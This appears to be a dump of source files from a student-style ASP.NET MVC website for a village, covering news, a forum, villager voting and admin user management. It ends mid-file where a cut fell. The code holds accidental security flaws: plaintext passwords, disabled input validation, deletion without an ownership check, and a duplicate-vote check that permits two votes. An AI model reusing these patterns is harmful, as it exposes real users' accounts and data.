"is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 2109, "license_type": "no_license", "max_line_length": 158, "num_lines": 59, "path": "/GDKQ.Web/Controllers/HomeController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing GDKQ.Model;\n\nnamespace GDKQ.Web.Controllers\n{\n public class HomeController : Controller\n {\n // GET: Home\n public ActionResult Index()\n {\n return View();\n }\n\n\n public ActionResult Home()\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n List<Model.News> n = dal.News.Where(x => x.bh == \"22\" && x.IsDeleted == true).OrderByDescending(x => x.CreateTime).Take(3).ToList<Model.News>();\n List<Model.News> n1 = dal.News.Where(x => x.bh == \"411\" && x.IsDeleted == true).OrderByDescending(x => x.CreateTime).Take(2).ToList<Model.News>();\n List<Model.Article> a = dal.Article.Where(x => x.Enable == true).OrderByDescending(x => x.CreateTime).Take(11).ToList<Model.Article>();\n List<Model.News> n2 = dal.News.Where(x => x.bh == \"121\" && x.IsDeleted == true).OrderByDescending(x => x.CreateTime).Take(2).ToList<Model.News>();\n viewModel vm = new viewModel(n, n1, a, n2);\n return View(vm);\n }\n public class viewModel\n {\n public List<Article> a { get; set; }\n public List<News> n { get; set; }\n public List<News> n1 { get; set; }\n public List<News> n2 { get; set; }\n\n public viewModel(List<News> n, List<News> n1, List<Article> a, List<News> n2)\n {\n this.n = n;\n this.n1 = n1;\n this.a = a;\n this.n2 = n2;\n }\n }\n\n [HttpPost]\n public ActionResult AddLike(int? id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Article a= dal.Article.SingleOrDefault(x => x.ID == id);\n if (a==null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有该文章\" });\n }\n a.like_count++;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"点赞成功\" });\n }\n }\n}" }, { "alpha_fraction": 0.4677627384662628, "alphanum_fraction": 0.4680851101875305, "avg_line_length": 30.343435287475586, "blob_id": "263b5a72e8ce508733b841fc33f022868d3a6564", "content_id": "a2d3a2f601af27c3ec301fa5f1ee04f94fb7f596", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 3230, "license_type": "no_license", "max_line_length": 93, "num_lines": 99, "path": "/GDKQ.Web/Areas/Livelihood/Controllers/VoteController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\n\nnamespace GDKQ.Web.Areas.Livelihood.Controllers\n{\n public class VoteController : Controller\n {\n public ActionResult Index()\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Vote_Main vm = dal.Vote_Main.SingleOrDefault(x => x.Enabled == true);\n if (vm==null)\n {\n return Content(\"当前暂无投票\");\n }\n return View(vm);\n }\n\n [HttpPost]\n [ValidateAntiForgeryToken()]\n public ActionResult Index(int? id,string Choice)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Vote_Main vm = dal.Vote_Main.SingleOrDefault(x => x.ID == id);\n if (vm==null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有该投票\" });\n }\n \n Model.Villager v = Session[\"villager\"] as Model.Villager;\n if (v==null)\n {\n return Json(new { status = \"n\", info = \"只有村民才能投票哦\" });\n }\n\n if (string.IsNullOrEmpty(Choice))\n {\n return Json(new { status = \"n\", info = \"请选择同意或者反对\" });\n }\n\n bool bo;\n if (Choice==\"agree\")\n {\n bo = true;\n }\n else\n {\n bo = false;\n }\n \n int total = dal.Vote_Result.Count(x => x.VoteID == id && x.VillagerID == v.ID);\n if (total>1)\n {\n return Json(new { status = \"n\", info = \"不能重复投票哦\" });\n }\n\n dal.Vote_Result.Add(new Model.Vote_Result()\n {\n Agree = bo,\n VoteID = vm.ID,\n VillagerID = v.ID,\n CreateTime = DateTime.Now\n });\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"投票成功\" });\n }\n\n [Filter.VillagerLoginFilter]\n public ActionResult VoteResult(int?id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Vote_Main vom = dal.Vote_Main.SingleOrDefault(x => x.ID == id);\n if (vom==null)\n {\n return Content(\"没有该投票结果\");\n }\n int agree_num = dal.Vote_Result.Count(x => x.VoteID == id && x.Agree == true);\n int disagree_num= dal.Vote_Result.Count(x => x.VoteID == id && x.Agree == false);\n viewModel vm = new viewModel(vom, agree_num, disagree_num);\n return View(vm);\n }\n public class viewModel{\n public Model.Vote_Main vom { get; set; }//投票模型\n public int agree_num { get; set; }//同意数量\n public int disagree_num { get; set; }//反对数量\n\n public viewModel(Model.Vote_Main _vom, int _agree_num, int _disagree_num)\n {\n this.vom = _vom;\n this.agree_num = _agree_num;\n this.disagree_num = _disagree_num;\n }\n\n }\n }\n}" }, { "alpha_fraction": 0.5329912304878235, "alphanum_fraction": 0.5337243676185608, "avg_line_length": 29.311111450195312, "blob_id": "b7c5db4aab79dbc5e02cad44d77894470201e38a", "content_id": "d22bfefe963464916a53b05776ec9a026e9d76a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 1414, "license_type": "no_license", "max_line_length": 191, "num_lines": 45, "path": "/GDKQ.Web/Areas/User/Controllers/HomeController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\n\nnamespace GDKQ.Web.Areas.User.Controllers\n{\n public class HomeController : Controller\n {\n [Filter.UserLoginFilter]\n // GET: User/Home\n public ActionResult Index()\n {\n Model.User u = Session[\"user\"] as Model.User;\n if (u == null)\n {\n return Content(\"没有该用户的信息\");\n }\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.UserInfo ui = dal.UserInfo.SingleOrDefault(x => x.UserID == u.ID);\n if (ui == null)\n {\n return Content(\"没有该用户的信息\");\n }\n List<Model.Article> art = dal.Article.Where(x => x.AuthorID == u.ID && x.Enable == true && x.IsDeleted == true).OrderByDescending(x=>x.CreateTime).Take(5).ToList<Model.Article>();\n viewModel vm = new viewModel(ui, art);\n return View(vm);\n }\n\n public class viewModel\n {\n public Model.UserInfo ui { get; set; }//用户信息\n public List<Model.Article> Article { get; set; }//个人文章\n\n public viewModel(Model.UserInfo _ui, List<Model.Article> _ArticleList)\n {\n this.ui = _ui;\n this.Article = _ArticleList;\n }\n }\n\n\n }\n}\n" }, { "alpha_fraction": 0.46425092220306396, "alphanum_fraction": 0.46756282448768616, "avg_line_length": 31.087499618530273, "blob_id": "bbac951185dc68a180f0c74ba882689115110cd1", "content_id": "4f2271e0574e6d2fa99302b36583ff84f3b4874e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 5335, "license_type": "no_license", "max_line_length": 146, "num_lines": 160, "path": "/GDKQ.Web/Areas/Adm1n/Controllers/RoleManageController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using Common;\nusing System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing Webdiyer.WebControls.Mvc;\n\nnamespace GDKQ.Web.Areas.Adm1n.Controllers\n{\n [Filter.AdminLoginFilter]\n /// <summary>\n /// 角色管理器\n /// </summary>\n public class RoleManageController : Controller\n {\n\n #region\n /// <summary>\n /// 添加村民\n /// </summary>\n /// <returns></returns>\n public ActionResult AddVillager(int? id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Villager v = dal.Villager.SingleOrDefault(x => x.ID == id);\n if (id == null)//添加村民\n {\n v = new Model.Villager()\n {\n CreatTime = DateTime.Now,\n Enabled = true,\n IsDeleted = true,\n LastLoginIP = GetIPadress.GetHostAddress(),\n LastLoginTime = DateTime.Now,\n };\n }\n else\n {//修改村民信息\n\n if (v == null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有该村民\" });\n }\n }\n return View(v);\n }\n [ValidateAntiForgeryToken()]\n [HttpPost]\n [ValidateInput(false)]\n public ActionResult AddVillager(Model.Villager v)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n if (v.ID == 0)\n {\n //添加\n dal.Villager.Add(new Model.Villager()\n {\n UserName = v.UserName,\n Password = v.Password,\n RealName = v.RealName,\n Mobile = v.Mobile,\n CreatTime=v.CreatTime,\n Enabled=v.Enabled,\n IsDeleted=v.IsDeleted,\n LastLoginIP=v.LastLoginIP,\n LastLoginTime=v.LastLoginTime\n });\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"添加成功\" });\n }\n else\n {\n //编辑\n Model.Villager v_indbb = dal.Villager.SingleOrDefault(a => a.ID == v.ID);\n if (v_indbb == null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有该用户\" });\n }\n v_indbb.UserName = v.UserName;\n v_indbb.Password = v.Password;\n v_indbb.RealName = v.RealName;\n v_indbb.Mobile = v.Mobile;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"修改成功\" });\n }\n }\n\n\n /// <summary>\n /// 村民列表\n /// </summary>\n /// <returns></returns>\n public ActionResult Villager(int pageindex = 1)\n {\n int pagesize = 10;\n int total = 0;//总数\n DAL.GDKQContext dal = new DAL.GDKQContext();\n total = dal.Villager.Count();\n List<Model.Villager> list0 = dal.Villager.OrderBy(a => a.ID).Skip((pageindex - 1) * pagesize).Take(pagesize).ToList<Model.Villager>();\n PagedList<GDKQ.Model.Villager> list = new PagedList<Model.Villager>(list0, pageindex, pagesize, total);\n ViewBag.Title = \"村民管理\";\n return View(list);\n }\n\n [HttpPost]\n [ValidateAntiForgeryToken()]\n public ActionResult Forbidden(int id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Villager v = dal.Villager.SingleOrDefault(x => x.ID == id);\n if (v == null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有该用户\" });\n }\n v.Enabled = !v.Enabled;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"操作成功\" });\n }\n\n #endregion\n\n //↑村民管理\n\n\n /// <summary>\n /// 游客列表\n /// </summary>\n /// <param name=\"pageindex\"></param>\n /// <returns></returns>\n public new ActionResult User(int pageindex = 1)\n {\n int pagesize = 10;\n int total = 0;//总数\n DAL.GDKQContext dal = new DAL.GDKQContext();\n total = dal.User.Count();\n List<Model.User> list0 = dal.User.OrderBy(a => a.ID).Skip((pageindex - 1) * pagesize).Take(pagesize).ToList<Model.User>();\n PagedList<GDKQ.Model.User> list = new PagedList<Model.User>(list0, pageindex, pagesize, total);\n ViewBag.Title = \"游客管理\";\n return View(list);\n }\n\n\n [HttpPost]\n [ValidateAntiForgeryToken()]\n public ActionResult Forbidden1(int id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.User v = dal.User.SingleOrDefault(x => x.ID == id);\n if (v == null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有该用户\" });\n }\n v.Enabled = !v.Enabled;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"操作成功\" });\n }\n\n }\n}" }, { "alpha_fraction": 0.5270863771438599, "alphanum_fraction": 0.5270863771438599, "avg_line_length": 26.360000610351562, "blob_id": "63672013ba667c7db9f72f1818348775b68bcd1d", "content_id": "7db5679177b0d8bf8b61dcb52df2264bb7c54999", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 685, "license_type": "no_license", "max_line_length": 90, "num_lines": 25, "path": "/GDKQ.Web/Areas/Livelihood/LivelihoodAreaRegistration.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System.Web.Mvc;\n\nnamespace GDKQ.Web.Areas.Livelihood\n{\n public class LivelihoodAreaRegistration : AreaRegistration \n {\n public override string AreaName \n {\n get \n {\n return \"Livelihood\";\n }\n }\n\n public override void RegisterArea(AreaRegistrationContext context) \n {\n context.MapRoute(\n \"Livelihood_default\",\n \"Livelihood/{controller}/{action}/{id}\",\n new { controller = \"Home\", action = \"Index\", id = UrlParameter.Optional },\n new string[] { \"GDKQ.Web.Areas.Livelihood.Controllers\" }\n );\n }\n }\n}" }, { "alpha_fraction": 0.5796002745628357, "alphanum_fraction": 0.6113025546073914, "avg_line_length": 25.870370864868164, "blob_id": "40f816fa45bff296e74817e289079146358c3b13", "content_id": "f5dd6d0ed68648b2b308bef5c352a6087df86967", "detected_licenses": [ "MIT", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1503, "license_type": "permissive", "max_line_length": 137, "num_lines": 54, "path": "/GDKQ.Web/Content/Livelihood/js/affair.js", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "// JavaScript Document\n\nwindow.onload = function(){\n setInterval(function() {\n runtime();\n },2800);\n\n var list = document.getElementsByClassName(\"outside\");\n list[0].style.backgroundColor=\"#63b2f5\";\n\n}\n\n\n\nfunction listclicks(n){\n var list = document.getElementsByClassName(\"outside\");\n for (var i = 0 ; i <list.length;i++){\n list[i].style.backgroundColor=\"#f5f5f5\";\n console.log(list[i]);\n }\n console.log(n);\n console.log(list[n]);\n list[n].style.backgroundColor=\"#63b2f5\";\n}\n\n\nvar i = 0;\nvar arr = [\"/Content/Livelihood/images/af_img1.png\", \"/Content/Livelihood/images/af_img2.png\", \"/Content/Livelihood/images/af_img3.png\"];\nvar arrp = [\"修葺一心斋\", \"恭贺我村入选第二批中国传统村落名录\", \"巩固旧屋\"];\nfunction runtime() {\n var p = document.getElementById(\"p1\");\n var img1 = document.getElementById(\"af_img\");\n if (i == 3) {\n i = 0;\n }\n p.innerHTML=arrp[i];\n img1.src = arr[i];\n i = i+1;\n}\n\n\nfunction clicks(){\n var img2 = document.getElementById(\"af_img\").src;\n var imgs = img2.substring(img2.lastIndexOf(\"/\")+1);\n if (imgs===\"1.jpg\"){\n window.location.href=\"http://news.tzc.edu.cn/index.php/campus-updates/3180.html\"\n }\n if (imgs===\"2.jpg\"){\n window.location.href=\"http://news.tzc.edu.cn/index.php/campus-updates/3658.html\"\n }\n if (imgs===\"3.jpg\"){\n window.location.href=\"http://news.tzc.edu.cn/index.php/campus-updates/3312.html\"\n }\n}\n" }, { "alpha_fraction": 0.5318934917449951, "alphanum_fraction": 0.5354093313217163, "avg_line_length": 33.94736862182617, "blob_id": "806a1082c72071deb080e37db2b8a7ce91a211d0", "content_id": "fbae6a6cc21dd5e4f1e8e2611c9e59b648a7bd68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 2071, "license_type": "no_license", "max_line_length": 179, "num_lines": 57, "path": "/GDKQ.Web/Areas/User/Controllers/ArticleController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing Webdiyer.WebControls.Mvc;\n\nnamespace GDKQ.Web.Areas.User.Controllers\n{\n [Filter.UserLoginFilter]\n public class ArticleController : Controller\n {\n /// <summary>\n /// \n /// </summary>\n /// <param name=\"pageindex\">当前第几页</param>\n /// <returns></returns>\n public ActionResult List(int pageindex=1)\n {\n int pagesize = 10;//每页显示条数\n int total = 0;//总数\n Model.User u = Session[\"user\"] as Model.User;\n if (u == null)\n {\n return Content(\"重新登录\");\n }\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.UserInfo ui = dal.UserInfo.SingleOrDefault(x => x.UserID == u.ID);\n if (ui==null)\n {\n return Content(\"找不到该用户的资料\");\n }\n total = dal.Article.Count(a => a.AuthorID==u.ID && a.IsDeleted == true && a.Enable == true);\n List<Model.Article> list0 = dal.Article.Where(\n a => a.AuthorID ==u.ID ).OrderBy(a => a.AuthorID==u.ID&&a.IsDeleted==true&&a.Enable==true).Skip((pageindex - 1) * pagesize).Take(pagesize).ToList<Model.Article>();\n PagedList<GDKQ.Model.Article> list =new PagedList<Model.Article>(list0, pageindex, pagesize,total);\n ViewBag.username = ui.Nickname;\n return View(list);\n }\n\n\n [HttpPost]\n [ValidateAntiForgeryToken()]\n public ActionResult Delect(int id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Article art = dal.Article.SingleOrDefault(x => x.ID == id);\n if (art==null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有该文章\" });\n }\n art.IsDeleted = false;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"删除成功\" });\n }\n }\n}" }, { "alpha_fraction": 0.4751593768596649, "alphanum_fraction": 0.4793696701526642, "avg_line_length": 32.9346923828125, "blob_id": "154f465edd2cc1f8ce6870c67b9f56c6d8072549", "content_id": "418e4ead00459b1973a8f518d9d6df42b479a91c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 8735, "license_type": "no_license", "max_line_length": 178, "num_lines": 245, "path": "/GDKQ.Web/Areas/BBS/Controllers/NewsController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using Lucene.Net.Analysis;\nusing Lucene.Net.Analysis.Standard;\nusing System;\nusing System.Collections.Generic;\nusing System.IO;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing Webdiyer.WebControls.Mvc;\nusing Common;\n\nnamespace GDKQ.Web.Areas.BBS.Controllers\n{\n public class NewsController : Controller\n {\n /// <summary>\n /// 常见问题(list)\n /// </summary>\n /// <returns></returns>\n public ActionResult ListQ()\n {\n return View();\n }\n\n\n\n /// <summary>\n /// 精华文章bh=04 按照点赞数排序\n /// 最新文章bh=01 按时间\n /// 活动提倡bh=02 按时间\n /// 其它精彩bh=03 按时间\n /// </summary>\n /// <returns></returns>\n public ActionResult List(string bh, int pageindex = 1)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.UA_Category ca = dal.UA_Category.SingleOrDefault(x => x.bh == bh);\n if (ca == null)\n {\n return Content(\"请选择正确的分类\");\n }\n int pagesize = 10;//每页显示条数\n int total = 0;//总数\n total = dal.Article.Count(x => x.CategoryID == ca.bh && x.IsDeleted == true);\n if (total < 1)\n {\n return Content(\"暂无相关文章\");\n }\n List<Model.Article> list0;\n if (bh==\"04\")\n {\n list0 = dal.Article.Where(x => x.CategoryID == ca.bh && x.IsDeleted == true).OrderByDescending(x=>x.like_count).OrderByDescending(x=>x.CreateTime).Skip(\n (pageindex - 1) * pagesize).Take(pagesize).ToList<Model.Article>();\n }\n else\n {\n list0 = dal.Article.Where(x => x.CategoryID == ca.bh && x.IsDeleted == true).OrderByDescending(x=>x.CreateTime).OrderBy(a => a.ID).Skip(\n (pageindex - 1) * pagesize).Take(pagesize).ToList<Model.Article>();\n }\n PagedList<GDKQ.Model.Article> list = new PagedList<Model.Article>(list0, pageindex, pagesize, total);\n foreach (var item in list)\n {\n item.Body = HtmlFilter.ReplaceHtmlTag(item.Body); \n }\n ViewBag.Title = ca.CaName;\n ViewBag.bh = ca.bh;\n return View(list);\n }\n\n\n\n\n /// <summary>\n /// 用户发帖\n /// </summary>\n /// <returns></returns>\n public ActionResult Add()\n {\n return View();\n }\n\n\n [ValidateAntiForgeryToken()]\n [HttpPost]\n public ActionResult Add(string bh, string Label, string Title, string Body)\n {\n if (Session[\"user\"] == null)\n {\n return Json(new { status = \"n\", info = \"亲,记得先登录哦~\", NextUrl = \"/Login\" });\n }\n Model.User u = Session[\"user\"] as Model.User;\n if (string.IsNullOrEmpty(bh) || string.IsNullOrEmpty(Label) || string.IsNullOrEmpty(Title) || string.IsNullOrEmpty(Body))\n {\n return Json(new { status = \"n\", info = \"请填写完整的信息\", NextUrl = \"/BBS/News/Add\" });\n }\n\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.UA_Category uac = dal.UA_Category.SingleOrDefault(x => x.bh == bh);\n if (uac == null)\n {\n return Json(new { status = \"n\", info = \"没有该分类,请重新选择\", NextUrl = \"/BBS/News/Add\" });\n }\n dal.Article.Add(new Model.Article()\n {\n AuthorID = u.ID,\n AuthorName = u.UserName,\n Body = Body,\n Title = Title,\n CaName = uac.CaName,\n CategoryID = uac.bh,\n Comments = 0,\n CreateTime = DateTime.Now,\n IsDeleted = true,\n lab = Label + Title,\n like_count = 0,\n ModTime = DateTime.Now,\n VisitNum = 0,\n Enable = false,\n Photo = null\n });\n\n dal.SaveChanges();\n\n return Json(new { status = \"y\", info = \"发布成功,请等待管理员审核\", NextUrl = \"/BBS/Home\" });\n }\n\n /// <summary>\n /// 文章模型 文章&评论\n /// </summary>\n public class viewModel\n {\n public Model.Article Art { get; set; }//文章\n public List<Model.Comment> Comment { get; set; }//评论\n\n public viewModel(Model.Article _Art, List<Model.Comment> _Comment)\n {\n this.Art = _Art;\n this.Comment = _Comment;\n }\n }\n /// <summary>\n /// 文章单页\n /// </summary>\n /// <param name=\"id\"></param>\n /// <returns></returns>\n public ActionResult OnePage(int id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Article art = dal.Article.SingleOrDefault(x => x.ID == id);\n if (art == null)\n {\n return Content(\"数据库中没有该文章\");\n }\n List<Model.Comment> com = dal.Comment.Where(x => x.ArtcleID == art.ID).ToList<Model.Comment>();\n viewModel vm = new viewModel(art, com);\n ViewBag.Title = art.CaName;\n ViewBag.CategoryID = art.CategoryID;\n return View(vm);\n }\n\n [HttpPost]\n [ValidateAntiForgeryToken()]\n public ActionResult AddComments(string body, int? id)\n {\n if (!id.HasValue)\n {\n return Json(new { status = \"n\", info = \"该文章不存在\" });\n }\n if (string.IsNullOrEmpty(body))\n {\n return Json(new { status = \"n\", info = \"评论不能为空\" });\n }\n if (Session == null)\n {\n return Json(new { status = \"n1\", info = \"只有登录后才能评论哦,请先登录吧\" });\n }\n Model.User u = Session[\"user\"] as Model.User;\n\n if (u == null)\n {\n return Json(new { status = \"n1\", info = \"只有登录后才能评论哦,请先登录吧\" });\n }\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.UserInfo ui = dal.UserInfo.SingleOrDefault(x => x.UserID == u.ID);\n dal.Comment.Add(new Model.Comment()\n {\n Body = body,\n ArtcleID = id.Value,\n UserID = u.ID,\n UserName = u.UserName,\n Photo = ui.Photo,\n CreateTime = DateTime.Now\n });\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"评论成功\" });\n }\n\n\n\n public ActionResult ReturnResult()\n {\n return View();\n }\n [HttpPost]\n public ActionResult ReturnResult(string keywords,int pageindex = 1)\n {\n int total = 0;\n int pagesize = 5;\n if (string.IsNullOrEmpty(keywords))\n {\n return Json(new { status = \"n\", info = \"搜索关键字不能为空哦~\", NextUrl = \"/BBS/Home\" });\n }\n DAL.GDKQContext dal = new DAL.GDKQContext();\n total = dal.Article.Count(x => x.lab.IndexOf(keywords) > -1 && x.IsDeleted == true && x.Enable == true);\n if (total < 1)\n {\n return Json(new { status = \"n\", info = \"暂无相关的文章~\", NextUrl = \"/BBS/Home\" });\n }\n List<Model.Article> list0 = dal.Article.Where(x => x.lab.IndexOf(keywords) > -1 && x.IsDeleted == true && x.Enable == true).OrderByDescending(a => a.CreateTime).Skip(\n (pageindex - 1) * pagesize).Take(pagesize).ToList<Model.Article>();\n PagedList<GDKQ.Model.Article> list = new PagedList<Model.Article>(list0, pageindex, pagesize, total);\n ViewBag.Title = \"搜索结果\";\n\n return View(\"ReturnResult\",list);\n }\n\n /// <summary>\n /// 点赞\n /// </summary>\n /// <param name=\"id\"></param>\n /// <returns></returns>\n public ActionResult AddLikeCount(int id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Article art = dal.Article.SingleOrDefault(x => x.ID == id);\n if (art==null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有该文章\" });\n }\n art.like_count++;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"点赞成功\" });\n }\n }\n}" }, { "alpha_fraction": 0.46216681599617004, "alphanum_fraction": 0.5008598566055298, "avg_line_length": 35.637794494628906, "blob_id": "a0dbe56d83509a79278110afc66ced72bbbe79e4", "content_id": "071a2593ee9fac4597f5bbc24a8984c7da2fcf75", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 4916, "license_type": "no_license", "max_line_length": 330, "num_lines": 127, "path": "/GDKQ.Web/Areas/Adm1n/Controllers/VoteController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Globalization;\nusing System.Linq;\nusing System.Text.RegularExpressions;\nusing System.Web;\nusing System.Web.Mvc;\nusing Webdiyer.WebControls.Mvc;\n\nnamespace GDKQ.Web.Areas.Adm1n.Controllers\n{\n [Filter.AdminLoginFilter]\n public class VoteController : Controller\n {\n /// <summary>\n /// 投票分页\n /// </summary>\n /// <param name=\"bh\"></param>\n /// <param name=\"pageindex\"></param>\n /// <returns></returns>\n public ActionResult List( int pageindex = 1)\n {\n int pagesize = 10;//每页显示条数\n int total = 0;//总数\n DAL.GDKQContext dal = new DAL.GDKQContext();\n List<Model.Vote_Main> lvm = dal.Vote_Main.Where(x => x.IsDeleted == true).OrderByDescending(\n x=>x.CreateTime).Skip((pageindex - 1) * pagesize).Take(pagesize).ToList<Model.Vote_Main>();\n total = dal.Vote_Main.Count(n=> n.IsDeleted == true);\n if (total < 1)\n {\n return Content(\"数据库中没有相关投票\");\n }\n PagedList<GDKQ.Model.Vote_Main> list = new PagedList<Model.Vote_Main>(lvm, pageindex, pagesize, total);\n ViewBag.Title = \"投票管理\";\n return View(list);\n }\n\n public ActionResult Add()\n {\n return View();\n }\n\n [HttpPost]\n [ValidateInput(false)]\n [ValidateAntiForgeryToken()]\n public ActionResult Add(string title,string body,string endtime)\n {\n if (string.IsNullOrEmpty(title) || string.IsNullOrEmpty(body) || string.IsNullOrEmpty(endtime) )\n {\n return Json(new { status = \"n\", info = \"请填写完整的信息\" });\n }\n endtime += \" 00:00:00\";\n if (IsDate(endtime))\n {\n return Json(new { status = \"n\", info = \"请输入正确的日期格式1\" });\n }\n DateTime dt = Convert.ToDateTime(endtime);\n if (dt==null)\n {\n return Json(new { status = \"n\", info = \"请输入正确的日期格式2\" });\n }\n DAL.GDKQContext dal = new DAL.GDKQContext();\n if (dal.Vote_Main.Count(x=>x.Enabled==true)>0)\n {\n return Json(new { status = \"n\", info = \"同一时间只能发起一个投票,请确认是否有投票仍在进行\" });\n }\n dal.Vote_Main.Add(new Model.Vote_Main()\n {\n Title = title,\n Body = body,\n CreateTime = DateTime.Now,\n EndTime = dt,\n Enabled=true,\n IsDeleted=true\n });\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"添加成功\" });\n }\n\n\n public ActionResult VoteResult(int id)\n {\n if (id<1)\n {\n return Json(new { status=\"n\",info = \"数据库中没有该投票\" });\n }\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Vote_Main vm = dal.Vote_Main.SingleOrDefault(x => x.ID == id);\n if (vm==null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有该投票\" });\n }\n double total = dal.Vote_Result.Count(x => x.VoteID == id);\n double choice = dal.Vote_Result.Count(x => x.VoteID == id && x.Agree == true);\n ViewBag.Percent = (choice / total).ToString(\"P\");\n return View(vm);\n }\n\n /// <summary>\n /// 是否为日期型字符串\n /// </summary>\n /// <param name=\"StrSource\">日期字符串(2008-05-08)</param>\n /// <returns></returns>\n public static bool IsDate(string StrSource)\n {\n return Regex.IsMatch(StrSource, @\"^((((1[6-9]|[2-9]\\d)\\d{2})-(0?[13578]|1[02])-(0?[1-9]|[12]\\d|3[01]))|(((1[6-9]|[2-9]\\d)\\d{2})-(0?[13456789]|1[012])-(0?[1-9]|[12]\\d|30))|(((1[6-9]|[2-9]\\d)\\d{2})-0?2-(0?[1-9]|1\\d|2[0-9]))|(((1[6-9]|[2-9]\\d)(0[48]|[2468][048]|[13579][26])|((16|[2468][048]|[3579][26])00))-0?2-29-))$\");\n }\n\n\n //public class viewModel{\n // public List<Model.News> news001 { get; set; }//公示公告\n // public List<Model.News> news002 { get; set; }//建设农村\n // public List<Model.News> news003 { get; set; }//村内事务\n // public List<Model.News> news007 { get; set; }//时事要点\n\n // public viewModel(List<Model.News> newsList001, List<Model.News> newsList002, List<Model.News> newsList003, List<Model.News> newsList007)\n // {\n // this.news001 = newsList001;\n // this.news002 = newsList002;\n // this.news003 = newsList003;\n // this.news007 = newsList007;\n\n // }\n\n //}\n }\n}" }, { "alpha_fraction": 0.5087719559669495, "alphanum_fraction": 0.5142543911933899, "avg_line_length": 29.93220329284668, "blob_id": "ab9f98f5f803b050eadfa41c1821766ba36d9f51", "content_id": "14c583e6462e417fe4eeb9ba416cfc47bef8c167", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 1964, "license_type": "no_license", "max_line_length": 123, "num_lines": 59, "path": "/GDKQ.Web/Areas/Adm1n/Controllers/PwdModController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using Common;\nusing System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\n\nnamespace GDKQ.Web.Areas.Adm1n.Controllers\n{\n public class PwdModController : Controller\n {\n [Filter.AdminLoginFilter]\n //修改密码\n public ActionResult Index()\n {\n return View();\n }\n\n\n [ValidateAntiForgeryToken()]\n [HttpPost]\n\n public ActionResult Index(string password,string password1,string password2)\n {\n if (string.IsNullOrEmpty(password) || string.IsNullOrEmpty(password1) || string.IsNullOrEmpty(password2))//密码校验\n {\n return Json(new { status = 